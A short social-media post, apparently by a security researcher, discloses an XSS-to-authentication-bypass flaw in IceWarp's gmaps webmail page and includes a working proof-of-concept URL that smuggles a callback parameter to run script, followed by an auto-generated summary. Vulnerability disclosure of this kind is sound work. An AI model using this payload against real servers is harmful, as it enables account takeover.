
CVE-2025-14499: IceWarp gmaps XSS→Auth Bypass (CVSS 8.8) Found & verified by me 🔍 PoC (first public): https://target/webmail/client/gmaps.html?obj=test&key=test%26callback=alert(origin)%23 ZDI-25-1071 | CWE-79 #CVE #XSS
Post summary
A publicly available proof‑of‑concept URL demonstrates a cross‑site scripting flaw with authentication bypass in IceWarp’s GMaps integration, rated CVSS 8.8 and classified under CWE‑79.
